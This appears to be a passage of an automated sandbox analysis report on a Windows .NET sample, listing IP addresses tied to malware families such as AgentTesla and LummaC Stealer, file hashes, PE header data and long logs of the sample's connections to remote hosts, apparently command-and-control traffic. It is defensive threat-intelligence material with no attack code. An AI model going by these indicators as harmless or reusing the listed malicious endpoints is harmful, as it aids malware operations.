                                                                     NTT-LT-ASLT | loligang.mpsl.elf | malicious | Mirai | 84.32.53.129
                                                                     NTT-LT-ASLT | attached order.exe | malicious | FormBook, PureLog Stealer | 84.32.84.32
                                                                     NTT-LT-ASLT | DO-COSU6387686280.pdf.exe | malicious | FormBook, PureLog Stealer | 84.32.84.32
                                                                     NTT-LT-ASLT | x86_64.nn.elf | malicious | Mirai, Okiru | 84.32.51.16
                                                                     Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                     3b5074b1b5d032e5620f69f9f700ff0e | z21nfe_20231205_001.vbs | malicious | Unknown | 84.32.84.100
                                                                     3b5074b1b5d032e5620f69f9f700ff0e | 7Gt3icFvQW.exe | malicious | AgentTesla | 84.32.84.100
                                                                     3b5074b1b5d032e5620f69f9f700ff0e | 1AxSwjpyGp.exe | malicious | AgentTesla, DarkTortilla | 84.32.84.100
                                                                     3b5074b1b5d032e5620f69f9f700ff0e | V5P3YggUcy.exe | malicious | LummaC Stealer | 84.32.84.100
                                                                     3b5074b1b5d032e5620f69f9f700ff0e | FPBKcOFjEP.exe | malicious | AgentTesla, DarkTortilla | 84.32.84.100
                                                                     3b5074b1b5d032e5620f69f9f700ff0e | V5P3YggUcy.exe | malicious | LummaC Stealer | 84.32.84.100
                                                                     3b5074b1b5d032e5620f69f9f700ff0e | LiteDBViewer.exe | malicious | LummaC Stealer | 84.32.84.100
                                                                     3b5074b1b5d032e5620f69f9f700ff0e | MerchantDetailedStatement_37063_04122024.exe | malicious | AgentTesla | 84.32.84.100
                                                                     3b5074b1b5d032e5620f69f9f700ff0e | MiJZ3z4t5K.exe | malicious | Unknown | 84.32.84.100
                                                                    No context
                                                                    Process:C:\Users\user\Desktop\iGxCM2I5u9.exe
                                                                    File Type:SQLite 3.x database, user version 57, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 2, database pages 41, cookie 0x21, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):5242880
                                                                    Entropy (8bit):0.035631294721445904
                                                                    Encrypted:false
                                                                    SSDEEP:192:bZjnkYjcoBMcygNDI7oslTYBIQg6Ism2Vspvp0:bZTVTBMcygNDuT1l62p
                                                                    MD5:59E4A8110FA2BCC012E341B93E96E93D
                                                                    SHA1:EE08810B0CE857F01170C08A24B9D438B64D577D
                                                                    SHA-256:3A85F2FC349A7E431EA6F1FC4568C99C1918D478AD6FE6445D560EF00395DB40
                                                                    SHA-512:2AD00B0FCBE4FC37ECAA68C16BE32A904D682A23ACF5B39BCECF5DC280E23933FDD5A0D2A92A45F2C77618CA7466334AFEB1EAA7EA07BF4E043282B31039E8FF
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Process:C:\Users\user\Desktop\iGxCM2I5u9.exe
                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):98304
                                                                    Entropy (8bit):0.08231524779339361
                                                                    Encrypted:false
                                                                    SSDEEP:12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
                                                                    MD5:886A5F9308577FDF19279AA582D0024D
                                                                    SHA1:CDCCC11837CDDB657EB0EF6A01202451ECDF4992
                                                                    SHA-256:BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
                                                                    SHA-512:FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):5.581328681783163
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                    File name:iGxCM2I5u9.exe
                                                                    File size:288'768 bytes
                                                                    MD5:8c6fb38b219a123b9340465b8d2dd5f8
                                                                    SHA1:35242280f551684b9e47726d5f94f1615c0dc76e
                                                                    SHA256:2960e7ad1d18bf517b5b4edf6e674e5ffdc587a8672cac0b24907a8fae8de59c
                                                                    SHA512:dd33b0934cfb262862b388b843c2ff13637c0cc1b75b7e7a8cb1640a3d39066e9681137b6ff68545eeb9a0850f23c24b470963520852f51d8644cd9de74768dd
                                                                    SSDEEP:6144:VvzIeMWcsLDGfFYiudGV0LkB/dQs7XJBCIX8boS7ZS/5iEl:V7xH5upVB+4XJBCIXc7O5i
                                                                    TLSH:4E542B3BABE54805F1EE9A7DCD9E1B62CB65D1022805B353BA436166AD01FFCEC0B0D5
                                                                    Icon Hash:90cececece8e8eb0
                                                                    Entrypoint:0x447dce
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x9A13B17D [Thu Nov 30 18:31:25 2051 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x47d74          0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x48000          0x5ae         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x4a000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x45dd4       0x45e00   27daab8f368ecf41af2b6118b0468c64  False     0.4570557077370304  data       5.595000262158807    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x48000          0x5ae         0x600     8868a3744e55c20cd447f55a71c0cfe6  False     0.423828125         data       4.075422995246891    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x4a000          0xc           0x200     e9e66b5e7836ecf366f34ef7d9162967  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA      Size   Type                                                                                 Language  Country  ZLIB Complexity
RT_VERSION   0x480a0  0x324  data                                                                                                    0.43407960199004975
RT_MANIFEST  0x483c4  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                       0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                           Source Port  Dest Port  Source IP       Dest IP
Dec 5, 2024 13:10:58.456578016 CET  49756        443        192.168.11.20   84.32.84.100
Dec 5, 2024 13:10:58.456676960 CET  443          49756      84.32.84.100    192.168.11.20
Dec 5, 2024 13:10:58.456861019 CET  49756        443        192.168.11.20   84.32.84.100
Dec 5, 2024 13:10:58.465698004 CET  49756        443        192.168.11.20   84.32.84.100
Dec 5, 2024 13:10:58.465727091 CET  443          49756      84.32.84.100    192.168.11.20
Dec 5, 2024 13:10:58.952630997 CET  443          49756      84.32.84.100    192.168.11.20
Dec 5, 2024 13:10:58.952848911 CET  49756        443        192.168.11.20   84.32.84.100
Dec 5, 2024 13:10:58.956934929 CET  49756        443        192.168.11.20   84.32.84.100
Dec 5, 2024 13:10:58.956963062 CET  443          49756      84.32.84.100    192.168.11.20
Dec 5, 2024 13:10:58.957484007 CET  443          49756      84.32.84.100    192.168.11.20
Dec 5, 2024 13:10:58.993479967 CET  49756        443        192.168.11.20   84.32.84.100
Dec 5, 2024 13:10:59.034251928 CET  443          49756      84.32.84.100    192.168.11.20
Dec 5, 2024 13:10:59.758460999 CET  443          49756      84.32.84.100    192.168.11.20
Dec 5, 2024 13:10:59.762635946 CET  443          49756      84.32.84.100    192.168.11.20
Dec 5, 2024 13:10:59.762763977 CET  443          49756      84.32.84.100    192.168.11.20
Dec 5, 2024 13:10:59.762821913 CET  49756        443        192.168.11.20   84.32.84.100
Dec 5, 2024 13:10:59.762937069 CET  49756        443        192.168.11.20   84.32.84.100
Dec 5, 2024 13:10:59.765357018 CET  49756        443        192.168.11.20   84.32.84.100
Dec 5, 2024 13:11:10.786494970 CET  49757        80         192.168.11.20   104.16.185.241
Dec 5, 2024 13:11:10.910146952 CET  80           49757      104.16.185.241  192.168.11.20
Dec 5, 2024 13:11:10.910439014 CET  49757        80         192.168.11.20   104.16.185.241
Dec 5, 2024 13:11:10.910578966 CET  49757        80         192.168.11.20   104.16.185.241
Dec 5, 2024 13:11:11.034549952 CET  80           49757      104.16.185.241  192.168.11.20
Dec 5, 2024 13:11:11.044116974 CET  80           49757      104.16.185.241  192.168.11.20
Dec 5, 2024 13:11:11.097847939 CET  49757        80         192.168.11.20   104.16.185.241
Dec 5, 2024 13:11:18.403750896 CET  49758        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:18.665327072 CET  32089        49758      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:19.174123049 CET  49758        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:19.433252096 CET  32089        49758      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:19.939558983 CET  49758        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:20.198769093 CET  32089        49758      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:20.705096960 CET  49758        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:20.964309931 CET  32089        49758      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:21.470525980 CET  49758        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:21.729711056 CET  32089        49758      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:22.236149073 CET  49759        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:22.499629021 CET  32089        49759      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:23.001425982 CET  49759        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:23.261048079 CET  32089        49759      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:23.766879082 CET  49759        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:24.026401997 CET  32089        49759      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:24.532339096 CET  49759        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:24.791630983 CET  32089        49759      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:25.297840118 CET  49759        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:25.557238102 CET  32089        49759      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:26.063503981 CET  49760        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:26.323013067 CET  32089        49760      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:26.828697920 CET  49760        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:27.088210106 CET  32089        49760      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:27.594157934 CET  49760        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:27.854892969 CET  32089        49760      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:28.359769106 CET  49760        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:28.619589090 CET  32089        49760      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:29.125132084 CET  49760        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:29.384670019 CET  32089        49760      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:29.890830994 CET  49761        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:30.150563002 CET  32089        49761      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:30.655987978 CET  49761        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:30.916224957 CET  32089        49761      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:31.421607018 CET  49761        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:31.681363106 CET  32089        49761      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:32.187225103 CET  49761        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:32.446922064 CET  32089        49761      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:32.952554941 CET  49761        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:33.212513924 CET  32089        49761      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:33.718094110 CET  49762        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:33.978727102 CET  32089        49762      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:34.483612061 CET  49762        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:34.743202925 CET  32089        49762      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:35.248883963 CET  49762        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:35.508801937 CET  32089        49762      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:36.014451027 CET  49762        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:36.274719000 CET  32089        49762      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:36.779697895 CET  49762        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:37.039282084 CET  32089        49762      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:37.545368910 CET  49763        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:37.805562973 CET  32089        49763      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:38.310929060 CET  49763        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:38.570280075 CET  32089        49763      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:39.076112986 CET  49763        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:39.336026907 CET  32089        49763      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:39.841525078 CET  49763        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:40.100971937 CET  32089        49763      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:40.607111931 CET  49763        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:40.866338968 CET  32089        49763      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:41.372649908 CET  49765        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:41.632105112 CET  32089        49765      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:42.138091087 CET  49765        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:42.397764921 CET  32089        49765      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:42.903673887 CET  49765        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:43.163398981 CET  32089        49765      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:43.668849945 CET  49765        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:43.928287029 CET  32089        49765      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:44.434472084 CET  49765        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:44.693830013 CET  32089        49765      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:45.200104952 CET  49766        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:45.459999084 CET  32089        49766      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:45.965172052 CET  49766        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:46.225430965 CET  32089        49766      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:46.730823040 CET  49766        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:46.991516113 CET  32089        49766      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:47.496202946 CET  49766        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:47.756242037 CET  32089        49766      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:48.261539936 CET  49766        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:48.521487951 CET  32089        49766      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:49.027221918 CET  49767        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:49.287363052 CET  32089        49767      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:49.792613029 CET  49767        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:50.052078962 CET  32089        49767      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:50.558023930 CET  49767        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:50.817570925 CET  32089        49767      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:51.323410034 CET  49767        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:51.583103895 CET  32089        49767      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:52.088951111 CET  49767        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:52.348805904 CET  32089        49767      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:52.855249882 CET  49768        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:53.114901066 CET  32089        49768      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:53.620045900 CET  49768        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:53.879767895 CET  32089        49768      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:54.385238886 CET  49768        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:54.645189047 CET  32089        49768      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:55.150542021 CET  49768        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:55.410403967 CET  32089        49768      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:55.916134119 CET  49768        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:56.175992012 CET  32089        49768      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:56.681746960 CET  49769        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:56.941669941 CET  32089        49769      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:57.447223902 CET  49769        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:57.706456900 CET  32089        49769      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:58.212426901 CET  49769        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:58.472050905 CET  32089        49769      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:58.978032112 CET  49769        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:11:59.237617016 CET  32089        49769      89.23.100.233   192.168.11.20
Dec 5, 2024 13:11:59.743547916 CET  49769        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:12:00.002795935 CET  32089        49769      89.23.100.233   192.168.11.20
Dec 5, 2024 13:12:00.508939028 CET  49770        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:12:00.768323898 CET  32089        49770      89.23.100.233   192.168.11.20
Dec 5, 2024 13:12:01.274403095 CET  49770        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:12:01.533962011 CET  32089        49770      89.23.100.233   192.168.11.20
Dec 5, 2024 13:12:02.039722919 CET  49770        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:12:02.299520016 CET  32089        49770      89.23.100.233   192.168.11.20
Dec 5, 2024 13:12:02.805342913 CET  49770        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:12:03.064946890 CET  32089        49770      89.23.100.233   192.168.11.20
Dec 5, 2024 13:12:03.570915937 CET  49770        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:12:03.830455065 CET  32089        49770      89.23.100.233   192.168.11.20
Dec 5, 2024 13:12:04.336419106 CET  49771        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:12:04.596240044 CET  32089        49771      89.23.100.233   192.168.11.20
Dec 5, 2024 13:12:05.101504087 CET  49771        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:12:05.361217976 CET  32089        49771      89.23.100.233   192.168.11.20
Dec 5, 2024 13:12:05.866952896 CET  49771        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:12:06.126665115 CET  32089        49771      89.23.100.233   192.168.11.20
Dec 5, 2024 13:12:06.632771969 CET  49771        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:12:06.892832041 CET  32089        49771      89.23.100.233   192.168.11.20
Dec 5, 2024 13:12:07.398052931 CET  49771        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:12:07.657634020 CET  32089        49771      89.23.100.233   192.168.11.20
Dec 5, 2024 13:12:08.164151907 CET  49772        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:12:08.423937082 CET  32089        49772      89.23.100.233   192.168.11.20
Dec 5, 2024 13:12:08.928797007 CET  49772        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:12:09.188416004 CET  32089        49772      89.23.100.233   192.168.11.20
Dec 5, 2024 13:12:09.694199085 CET  49772        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:12:09.953660965 CET  32089        49772      89.23.100.233   192.168.11.20
Dec 5, 2024 13:12:10.460022926 CET  49772        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:12:10.719687939 CET  32089        49772      89.23.100.233   192.168.11.20
Dec 5, 2024 13:12:11.225394011 CET  49772        32089      192.168.11.20   89.23.100.233
Dec 5, 2024 13:12:11.485069036 CET  32089        49772      89.23.100.233   192.168.11.20
                                                                    Dec 5, 2024 13:12:11.990864992 CET4977332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:12.250678062 CET320894977389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:12.756221056 CET4977332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:13.016201019 CET320894977389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:13.521657944 CET4977332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:13.781640053 CET320894977389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:14.287004948 CET4977332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:14.546767950 CET320894977389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:15.052642107 CET4977332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:15.312589884 CET320894977389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:15.818157911 CET4977432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:16.077905893 CET320894977489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:16.583695889 CET4977432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:16.843548059 CET320894977489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:17.348779917 CET4977432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:17.608302116 CET320894977489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:18.114219904 CET4977432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:18.373795986 CET320894977489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:18.879637003 CET4977432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:19.139071941 CET320894977489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:19.645272017 CET4977532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:19.904793978 CET320894977589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:20.410556078 CET4977532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:20.670135021 CET320894977589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:21.176125050 CET4977532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:21.435755968 CET320894977589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:21.941450119 CET4977532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:22.201677084 CET320894977589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:22.706944942 CET4977532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:22.966423988 CET320894977589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:23.472696066 CET4977632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:23.732352972 CET320894977689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:24.237827063 CET4977632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:24.497513056 CET320894977689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:25.003299952 CET4977632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:25.262996912 CET320894977689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:25.768795013 CET4977632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:26.028275967 CET320894977689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:26.534375906 CET4977632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:26.793761969 CET320894977689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:27.300060987 CET4977732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:27.559773922 CET320894977789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:28.065268040 CET4977732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:28.325084925 CET320894977789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:28.830599070 CET4977732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:29.089895964 CET320894977789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:29.596309900 CET4977732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:29.855775118 CET320894977789.23.100.233192.168.11.20
